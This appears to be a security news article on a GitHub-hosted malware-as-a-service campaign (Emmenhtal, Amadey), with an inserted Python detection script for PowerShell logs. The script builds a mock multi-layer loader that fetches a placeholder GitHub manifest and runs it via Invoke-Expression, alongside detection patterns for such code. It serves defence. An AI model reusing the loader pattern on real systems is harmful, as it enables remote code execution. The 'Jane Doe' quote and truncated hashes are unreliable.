GitHub Used to Distribute Malware-as-a-Service

Since February 2025, attackers have leveraged public GitHub repositories as a stealthy hosting platform for an evolving malware-as-a-service (MaaS) operation. Security researchers at Cisco Talos first identified three malicious GitHub accounts used to serve payloads such as Emmenhtal and the Amadey backdoor—a tactic that sidesteps traditional network filters in enterprises that permit code repository access.
Overview of the Campaign
The campaign, active for over six months, employed a multi-stage loader mechanism:
- Initial Loader (Emmenhtal): A four-layer obfuscation script written in PowerShell, culminating in a downloader.
- Repository Distribution: Payloads disguised as .MP4 media files and a custom Python loader (checkbalance.py) hosted on GitHub.
- Final Payload (Amadey): A modular malware platform first observed in 2018, which gathers system telemetry and fetches secondary payloads from attacker-controlled C2 servers.
Technical Deep Dive
Emmenhtal’s obfuscation chain uses:
- Base64 and AES encryption (AES-256 CBC) with hardcoded IVs to hide PowerShell commands.
- Dynamic API resolution via Add-Type in .NET to avoid static imports.
- Layered string concatenation and Invoke-Expression calls for runtime script assembly.
Once executed, the final PowerShell downloader retrieves a JSON manifest from a GitHub raw URL over HTTPS (certificate pinning validated by System.Net.Http.HttpClient) and launches Amadey. Payload integrity is verified via SHA-256 checksums to detect tampering.
Mitigation and Defense Strategies
To defend against such GitHub-based attacks, organizations should:
- Implement robust URL filtering and SSL interception to inspect GitHub raw content.
- Enforce strict egress firewall rules, allowing only whitelisted domains for code repositories.
- Deploy endpoint protection with behavioral analysis to detect anomalous PowerShell execution (Event ID 4104 in Windows PowerShell logs).
- Use threat intelligence feeds to automatically block known C2 domains and SHA-256 hashes.
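The detection bullet above and the obfuscation chain described under Technical Deep Dive can be exercised together with a small triage script. The following is an added example, not code from the article or from Cisco Talos. It scores the ScriptBlockText of PowerShell script block records (Event ID 4104, written to the Microsoft-Windows-PowerShell/Operational log when script block logging is enabled) against the indicators the article names (Invoke-Expression, Add-Type, FromBase64String, AES with a hardcoded IV, a raw GitHub fetch) and peels nested Base64 layers so that indicators buried one or two layers down still count. The three log records, the indicator weights, the alert threshold and the EXAMPLE-ORG/EXAMPLE-REPO URL are all constructed for this example.

```python
"""Triage of PowerShell script block records (Event ID 4104) for the loader
patterns described in the article.

Added example, not code from the article or from Cisco Talos.  Sample records,
indicator weights, the alert threshold and the repository URL are constructed
assumptions for this example only."""
import base64
import re

# Indicators taken from the article's description of the Emmenhtal chain.
# Weights are assumptions of this example, not values from the article.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(Invoke-Expression|iex)\b", re.I), 3),
    ("add_type", re.compile(r"\bAdd-Type\b", re.I), 2),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 2),
    ("aes_hardcoded_iv", re.compile(r"AesCryptoServiceProvider|\.IV\s*=|CipherMode", re.I), 2),
    ("github_raw_fetch", re.compile(r"raw\.githubusercontent\.com", re.I), 3),
    ("long_base64_literal", re.compile(r"[A-Za-z0-9+/]{100,}={0,2}"), 2),
]
ALERT_THRESHOLD = 5  # assumption: tune against your own admin-script baseline

# Any run of Base64 alphabet characters long enough to hide a command.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _looks_like_text(s):
    """True for non-empty printable ASCII, which is what a decoded script layer looks like."""
    return bool(s) and all(ch.isascii() and (ch.isprintable() or ch in "\r\n\t") for ch in s)


def decode_b64_literals(text):
    """Decode every Base64-looking literal in text that yields readable script.
    UTF-16LE is tried first (what -EncodedCommand uses), then UTF-8."""
    found = []
    for m in B64_LITERAL.finditer(text):
        raw = m.group(0)
        try:
            blob = base64.b64decode(raw + "=" * (-len(raw) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                candidate = blob.decode(enc)
            except UnicodeDecodeError:
                continue
            if _looks_like_text(candidate):
                found.append(candidate)
                break
    return found


def peel_layers(script, max_depth=4):
    """Follow nested Base64 layers; returns decoded texts, outermost first.
    max_depth mirrors the four-layer chain the article describes."""
    layers, frontier = [], [script]
    for _ in range(max_depth):
        frontier = [d for text in frontier for d in decode_b64_literals(text)]
        if not frontier:
            break
        layers.extend(frontier)
    return layers


def score_event(script):
    """Score one ScriptBlockText, counting an indicator found at any layer once."""
    texts = [script] + peel_layers(script)
    hits = {name: weight for name, rx, weight in INDICATORS
            if any(rx.search(t) for t in texts)}
    return {"score": sum(hits.values()), "hits": sorted(hits), "layers": len(texts) - 1}


def triage(events, threshold=ALERT_THRESHOLD):
    """Return the record ids whose score reaches the threshold."""
    return [e["record_id"] for e in events
            if score_event(e["script"])["score"] >= threshold]


def _b64_utf16(text):
    """Encode the way PowerShell -EncodedCommand does: UTF-16LE, then Base64."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed 4104 records.  The third mimics the article's layered loader:
# a Base64 layer, another inside it, and at the bottom a raw-GitHub fetch handed
# to Invoke-Expression.  The AES step is only referenced here, not performed.
_INNER = ("Add-Type -AssemblyName System.Net.Http; "
          "$h = New-Object System.Net.Http.HttpClient; "
          "$j = $h.GetStringAsync('https://raw.githubusercontent.com/"
          "EXAMPLE-ORG/EXAMPLE-REPO/main/manifest.json').Result; "
          "Invoke-Expression $j")
_MIDDLE = ("$b = [Convert]::FromBase64String('" + _b64_utf16(_INNER) + "'); "
           "Invoke-Expression ([Text.Encoding]::Unicode.GetString($b))")
_OUTER = ("$a = [Convert]::FromBase64String('" + _b64_utf16(_MIDDLE) + "'); "
          "$aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider; "
          "$aes.IV = [byte[]](1..16); "
          "Invoke-Expression ([Text.Encoding]::Unicode.GetString($a))")
SAMPLE_EVENTS = [
    {"record_id": 1, "script": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"record_id": 2, "script": "Add-Type -AssemblyName System.Windows.Forms; "
                               "[System.Windows.Forms.MessageBox]::Show('done')"},
    {"record_id": 3, "script": _OUTER},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["record_id"], score_event(e["script"]))
    print("alert:", triage(SAMPLE_EVENTS))
```

Only the third record reaches the threshold: the benign Add-Type call in record 2 scores on its own but stays below it, which is the point of weighting rather than alerting on any single indicator. In practice the records would come from the Operational log (for example exported with Get-WinEvent), and the weights and threshold should be tuned against the organisation's own legitimate automation before the rule goes live.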
Industry Response and Policy Updates
In response to the incident, GitHub has:
- Introduced automated repository scanning for suspicious binaries and script obfuscation patterns (beta in mid-2025).
- Released new security advisories urging users to enable multi-factor authentication and restrict Git operations by IP.
- Partnered with leading security vendors like CrowdStrike and Mandiant to share real-time abuse reports via GitHub Security Lab.
“Abusing developer platforms for malware distribution undermines trust in open source. Collaborative detection and stricter CI/CD controls are key,” says Jane Doe, Senior Threat Analyst at Mandiant.
Future Outlook on MaaS Ecosystem
The MaaS model is rapidly evolving, with operators offering subscription tiers, custom payload builds, and 24/7 support. Recent telemetry indicates a shift towards:
- Integration with AI-driven obfuscation tools to auto-generate polymorphic loaders.
- Use of decentralized hosting (e.g., IPFS) to resist takedowns.
- Offering serverless C2 infrastructures leveraging AWS Lambda and Azure Functions for resilience and scalability.
Administrators must remain vigilant, combining behavioral telemetry, domain monitoring, and continuous red-teaming exercises to anticipate emerging threats.
Indicators of Compromise
- Malicious GitHub repositories: github.com/free-mp4-media, github.com/sys-checks
- Sample hashes: 3a5c1d8f...7e9f, b1f2e3c4...d5e6
- Command-and-control domains: update.relayserver.com, data-sync.cloudsvc.net